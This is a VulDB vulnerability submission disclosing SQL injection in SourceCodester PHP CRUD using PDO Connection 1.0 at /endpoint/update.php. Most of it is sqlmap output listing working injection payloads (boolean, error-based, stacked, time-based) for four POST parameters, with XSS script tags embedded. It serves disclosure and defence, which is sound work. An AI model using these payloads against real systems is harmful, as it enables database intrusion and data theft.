Submit #403662: SourceCodester PHP CRUD using PDO Connection 1.0 SQL Injectioninfo

TitleSourceCodester PHP CRUD using PDO Connection 1.0 SQL Injection
DescriptionI would like to report a SQL injection vulnerability I discovered in the sourcecodester of the PHP CRUD using PDO Connection with Free Source Code during my testing. Details: Affected URL/Endpoint: /basic-crud/endpoint/update.php Vulnerable Parameter: tbl_person_id, first_name, middle_name, last_name Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Click on update 2) Use a proxy like burpsuite to intercept the "update" request. 3) Input the payload to invoke the SQL injection. --- table=tbl_person&tbl_person_id=3+%27+AND+GTID_SUBSET%28CONCAT%280x716a766a71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29+AS+NCHAR%29%2C0x20%29%29%2C1%2C190%29%29%2C0x717a6b6271%29%2C7770%29--+kDOW&first_name=test&middle_name=test&last_name=test --- 4) It is also vulnerable to the following attacks after running sqlmap on it. --- Parameter: tbl_person_id (POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: table=tbl_person&tbl_person_id=3 ' AND EXTRACTVALUE(7279,CASE WHEN (7279=7279) THEN 7279 ELSE 0x3A END)-- fMxp&first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script> Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: table=tbl_person&tbl_person_id=3 ' AND GTID_SUBSET(CONCAT(0x716a766a71,(SELECT (ELT(8583=8583,1))),0x717a6b6271),8583)-- kDsX&first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script> Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: table=tbl_person&tbl_person_id=3 ';SELECT SLEEP(5)#&first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script> Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: table=tbl_person&tbl_person_id=3 ' AND (SELECT 5533 FROM (SELECT(SLEEP(5)))GxuT)-- zeFA&first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script> Parameter: last_name (POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>' AND EXTRACTVALUE(4540,CASE WHEN (4540=4540) THEN 4540 ELSE 0x3A END)-- tzjN Type: error-based Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>' OR GTID_SUBSET(CONCAT(0x716a766a71,(SELECT (ELT(7214=7214,1))),0x717a6b6271),7214)-- hAUA Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>' OR (SELECT 3365 FROM (SELECT(SLEEP(5)))ypJz)-- mXnd Parameter: middle_name (POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>' AND EXTRACTVALUE(7947,CASE WHEN (7947=7947) THEN 7947 ELSE 0x3A END)-- JoZH&last_name=<script>alert(3)</script> Type: error-based Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>' OR GTID_SUBSET(CONCAT(0x716a766a71,(SELECT (ELT(8199=8199,1))),0x717a6b6271),8199)-- IkLT&last_name=<script>alert(3)</script> Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>';SELECT SLEEP(5)#&last_name=<script>alert(3)</script> Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>' OR (SELECT 5068 FROM (SELECT(SLEEP(5)))sPQa)-- AZRO&last_name=<script>alert(3)</script> Parameter: first_name (POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>' AND EXTRACTVALUE(7800,CASE WHEN (7800=7800) THEN 7800 ELSE 0x3A END)-- TEHG&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script> Type: error-based Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>' OR GTID_SUBSET(CONCAT(0x716a766a71,(SELECT (ELT(3697=3697,1))),0x717a6b6271),3697)-- gmpZ&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script> Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>';SELECT SLEEP(5)#&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script> Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>' OR (SELECT 9947 FROM (SELECT(SLEEP(5)))oVQD)-- EFpm&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script> --- Please let me know if you need further information or a more detailed analysis.
User
 Delvy (UID 74555)
Submission09/06/2024 01:06 PM (10 months ago)
Moderation09/06/2024 11:36 PM (11 hours later)
StatusAccepted
VulDB Entry276784 [SourceCodester PHP CRUD 1.0 /endpoint/update.php tbl_person_id/first_name/middle_name/last_name sql injection]
Points17

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!